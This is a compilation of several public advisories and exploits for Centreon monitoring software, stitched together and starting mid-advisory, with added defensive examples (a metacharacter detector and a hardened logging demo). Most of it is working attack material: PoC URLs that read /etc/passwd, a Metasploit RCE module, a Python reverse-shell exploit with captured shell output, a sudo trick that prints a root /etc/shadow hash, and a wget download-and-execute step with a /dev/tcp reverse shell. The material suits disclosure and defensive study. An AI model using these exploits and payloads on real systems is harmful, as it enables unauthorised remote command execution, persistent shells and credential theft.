By exploiting CVE-2015-1560, an attacker can obtain, among other things, a valid session_id, which is required to exploit CVE-2015-1561.
================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
The $command_line variable, which is passed to the popen function, is built from unsanitized GET parameters.
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting a command into the "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=today&session_id=[valid session_id]
- Injecting "uname -a" into the "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%23&session_id=[valid session_id]
By combining the two vulnerabilities, an unauthenticated attacker can take control of the web server.
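The two command injections on this page, the 'persistant' POST parameter of ZSL-2015-5265 and the getStats.php GET parameters of CVE-2015-1561, share one trait a detection rule can key on: the injected value carries shell metacharacters that an id, a date or a comment never needs. The routine below is an added example, not part of either advisory. The sample requests are reconstructed from the PoCs on this page and embedded inline so it runs offline; the benign request is constructed.

```python
"""Flag request parameters that carry shell metacharacters.

Added example, not part of any advisory on this page. The sample requests
are reconstructed from the PoCs above (ZSL-2015-5265 POST body, CVE-2015-1561
URLs) and embedded inline; the benign request is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Characters that let a value break out of a command line built by string
# concatenation. $( is matched first so it is reported as one token.
SHELL_META = re.compile(r"\$\(|[;&|`$<>\\\n]")

# Reconstructed from the curl command in ZSL-2015-5265
PERSISTANT_URL = "http://localhost.localdomain/centreon/main.php?p=20218"
PERSISTANT_BODY = ("host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+"
                   "%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s"
                   "&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16"
                   "&comment=pwned&submitA=Save&o=as")
# The two getStats.php PoC URLs from CVE-2015-1561
GETSTATS_NS_ID = ("http://example.domain/centreon/include/Administration/corePerformance/"
                  "getStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check"
                  "&start=today&session_id=[valid session_id]")
GETSTATS_END = ("http://example.domain/centreon/include/Administration/corePerformance/"
                "getStats.php?ns_id=1&key=active_service_check&start=today"
                "&end=|+uname+-a+%23&session_id=[valid session_id]")
# Constructed benign request to the same endpoint as the persistant PoC
BENIGN_BODY = "host_id=14&service_id=19&persistant=1&comment=scheduled+maintenance&submitA=Save&o=as"


def suspicious_params(params):
    """Return {name: sorted metacharacter hits} for every parameter value that
    contains shell metacharacters. params maps name -> list of decoded values."""
    findings = {}
    for name, values in params.items():
        for value in values:
            hits = sorted(set(SHELL_META.findall(value)))
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


def inspect_request(url, body=""):
    """Decode query string and form body (application/x-www-form-urlencoded,
    so '+' and %XX are undone exactly as the server would) and scan both."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    return suspicious_params(params)


if __name__ == "__main__":
    for label, url, body in (("persistant", PERSISTANT_URL, PERSISTANT_BODY),
                             ("getStats ns_id", GETSTATS_NS_ID, ""),
                             ("getStats end", GETSTATS_END, ""),
                             ("benign", PERSISTANT_URL, BENIGN_BODY)):
        print(label, inspect_request(url, body))
```

Decoding before matching matters: in the persistant body every metacharacter arrives percent-encoded (%60, %26, %3e, %3c), so a rule that looks at the raw body for a literal backtick or ampersand misses it, while the server decodes it and hands it to the shell. The check is deliberately narrow (only the characters a shell needs to chain or redirect commands) so that ordinary values such as dates with slashes and times with colons do not fire.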
================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi
13/02/2015 - Vendor fixed RCE
References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582
About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  Rank = ExcellentRanking

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Centreon Web Useralias Command Execution',
        'Description' => %q(
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
          errors. This functionality can be abused for arbitrary code
          execution, and can be triggered via the login screen prior to
          authentication.
        ),
        'Author' =>
          [
            'h00die <mike@shorebreaksecurity.com>', # module
            'Nicolas CHATELAIN <n.chatelain@sysdream.com>' # discovery
          ],
        'References' =>
          [
            [ 'EDB', '39501' ]
          ],
        'License' => MSF_LICENSE,
        'Platform' => ['python'],
        'Privileged' => false,
        'Arch' => ARCH_PYTHON,
        'Targets' =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Feb 26 2016'
      )
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
      ], self.class
    )
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'GET'
      )
      # The login page prints the version next to the LoginInvitVersion label
      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
      if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
        vprint_good("Version Detected: #{version}")
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  def exploit
    begin
      vprint_status('Sending malicious login')
      # The trailing backslash breaks the SQL string; the resulting error is
      # echoed through exec(), which expands the $(...) substitution.
      send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'POST',
        'vars_post' =>
          {
            'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
            'password' => Rex::Text.rand_text_alpha(5)
          }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================
Description
===========
Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.
SQL injection leading to RCE
============================
Centreon logs SQL database errors to a log file using the "echo" system
command and the PHP exec() function. In the authentication class,
Centreon uses htmlentities with the ENT_QUOTES option to filter SQL
metacharacters.
However, Centreon doesn't filter the SQL escape character "\", so it is
still possible to trigger an SQL error, and the error message contains
the submitted input.
Because that message is written with the "echo" system command through
the PHP exec() function without any sanitization, it is possible to
inject arbitrary system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
----------------
Proof of Concept
----------------
TCP Reverse Shell using python.
#!/usr/bin/env python
# Runs on both Python 2.7 and 3: print as a function, base64 via the module.
from __future__ import print_function
import argparse
import base64
import requests


def shell(target, reverseip, reverseport):
    # Python one-liner run on the target: connect back and hand the socket to sh
    payload = ('import socket as a,subprocess as b,os as c;'
               's=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();'
               'c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
               % (reverseip, reverseport))
    print("[~] Starting reverseshell : %s - port : %d" % (reverseip, reverseport))
    encoded = base64.b64encode(payload.encode()).decode()
    # The trailing backslash breaks the SQL string and forces the logged error;
    # $(...) is then expanded by the shell behind exec("echo ...").
    requests.post(target, data={"useralias": "$(echo %s | base64 -d | python)\\" % encoded,
                                "password": "foo"})
    print("[+] DEAD !")


if __name__ == "__main__":
    print("[~] Centreon Unauthenticated RCE - Nicolas Chatelain <n.chatelain@sysdream.com>")
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True)
    parser.add_argument("--reverseip", required=True)
    parser.add_argument("--reverseport", required=True, type=int)
    args = parser.parse_args()
    shell(args.target, args.reverseip, args.reverseport)
Shell :
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py --target=http://172.16.138.137/centreon/index.php --reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthenticated RCE - Nicolas Chatelain <n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888
# Other term
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios
---------------
Vulnerable code
---------------
The vulnerable code is located in class/centreonLog.class.php, lines 82
and 154:

    /*
     * print Error in log file.
     */
    exec("echo \"".$string."\" >> ".$this->errorType[$id]);

In class/centreonAuth.class.php, line 227:

    $DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE `contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "' AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
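To make the chain concrete, here is an added example (not Centreon code) that re-creates the two steps above in Python. html.escape(quote=True) stands in for htmlentities(ENT_QUOTES) (it rewrites the same five characters: & < > " '), mysql_error() is a minimal stand-in for the database's quote parsing, and the log write keeps the exec("echo \"...\" >> logfile") shape, once as in the original and once with the argument quoted the way escapeshellarg would do it. A temporary file replaces the log file, and the payload is a harmless $(echo INJECTED) with the trailing backslash from the PoC.

```python
"""Why htmlentities(ENT_QUOTES) does not stop the centreonLog.class.php injection.

Added example, not Centreon code: it re-creates the two steps quoted above
in Python. html.escape(quote=True) stands in for PHP's htmlentities(ENT_QUOTES)
(same treatment of & < > " '), mysql_error() is a minimal stand-in for the
database's quote parsing, and the shell command has the shape of the
exec("echo \"...\" >> logfile") call. A temporary file is the log file.
"""
import html
import os
import shlex
import subprocess
import tempfile


def auth_query(username):
    """Contact lookup from centreonAuth.class.php, with its htmlentities filter."""
    return ("SELECT * FROM `contact` WHERE `contact_alias` = '%s' "
            "AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1"
            % html.escape(username, quote=True))


def mysql_error(query):
    """Stand-in for MySQL's string parsing: a backslash escapes the next character
    inside a quoted string, so a username ending in \\ swallows the closing quote,
    the statement never terminates and the error message carries the query."""
    in_str, i = False, 0
    while i < len(query):
        c = query[i]
        if in_str and c == "\\":
            i += 2                      # escaped character: skip it
            continue
        if c == "'":
            in_str = not in_str
        i += 1
    return "SQL syntax error near: " + query if in_str else None


def log_command_vulnerable(message, logfile):
    """Shape of the centreonLog.class.php call: the message sits inside double
    quotes, where the shell still expands $(...) and backticks."""
    return 'echo "%s" >> %s' % (message, logfile)


def log_command_hardened(message, logfile):
    """Same write with both arguments single-quoted (PHP: escapeshellarg)."""
    return "echo %s >> %s" % (shlex.quote(message), shlex.quote(logfile))


def run_login(username, build_command):
    """Simulate the login: if the query errors, write the error through the given
    log command and return what ended up in the log file."""
    error = mysql_error(auth_query(username))
    if error is None:
        return ""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        subprocess.run(["sh", "-c", build_command(error, path)],
                       stderr=subprocess.DEVNULL, check=True)
        with open(path) as f:
            return f.read()
    finally:
        os.unlink(path)


if __name__ == "__main__":
    # Constructed harmless payload in the shape of the PoC: $(...) plus a trailing \
    username = "$(echo INJECTED)\\"
    print(run_login(username, log_command_vulnerable))   # $(...) was executed
    print(run_login(username, log_command_hardened))     # $(...) logged verbatim
```

Two things are visible when this runs: the entity filter never touches `$`, `(`, `)` or `\`, so the attacker's text reaches the error message unchanged, and in the vulnerable command even the backticks around `contact` in the original query are executed by the shell, not just the injected substitution. The hardened variant still appends to the file, but the message is a single-quoted argument and is logged as-is; in PHP the equivalent is escapeshellarg($string), or better, dropping exec() and writing the log with file_put_contents().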
--------
Solution
--------
Update to Centreon 2.5.4.
Possible root password disclosure in centengine (Centreon Enterprise Server)
============================================================================
In some configurations centengine can be run as root through sudo.
Its configuration parser reports the offending line of any file it fails
to parse, which makes it possible to read the content of files that only
root can read.
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-209
----------------
Proof of Concept
----------------
$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1] bad variable name: 'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]
---------------
Vulnerable code
---------------
In Centreon Enterprise Server (CES) : /etc/sudoers.d/centreon
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
--------
Solution
--------
Do not allow centengine to be run as root, or do not disclose the line
that caused the error.
Timeline (dd/mm/yyyy)
=====================
* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon corrects the vulnerabilities
* 27/11/2014 : Centreon releases version 2.5.4, which fixes the vulnerabilities
Fixes
=====
* https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
* https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
* https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
Affected versions
=================
* Centreon <= 2.5.3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
source: https://www.securityfocus.com/bid/50568/info
Centreon is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
Centreon 2.3.1 is affected; other versions may also be vulnerable.
http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1
# Exploit Title: Centreon 19.10.5 - Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri BASO
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution Resources
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
By adding Poller Resources it is possible to call binaries that are not in the default $USER$ path.
Adding two resource entries is enough to trigger a download-and-execute reverse shell.
Note that the reverse shell is persistent, because Centreon runs the check, and therefore the payload, every 10 minutes by default.
Steps:
Objective 1 : Add Download Resource
Objective 2 : Add Exec Resource
Objective 3 : Create both check commands
Objective 4 : Create your services and link them with a host
Restart the Central.
###########################################################################################################
# Objective 1 : Add Download Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
- Information:
Read Centreon documentation:
To install Centreon software from the repository, you should first install the centreon-release package,
which will provide the repository file. Some may not have the wget package installed.
If not perform the following : yum install wget
Solution 1: Remove the restriction in Configuration/Pollers/Engine configuration
Solution 2: Raise the client-side input size limit in the browser inspector (<input> size="250")
Solution 3: Mixed, use a custom payload that fits the limits -> wget -P /tmp/ 127.0.0.1:8080/x.sh
# Objective 2 : Add Exec Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
Solution: Use a custom payload that fits the limits -> bash /tmp/x.sh
# Objective 3 : Create both check commands from your resources ($xxx$) without arguments
# Objective 4 : Create your services and link them with a host
POC:
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -
nc -lvnp 1234
Ncat: Version 7.50
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:43128.
id
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
sudo -l
Matching Defaults entries for centreon-engine on centreon-lab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon-engine may run the following commands on centreon-lab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd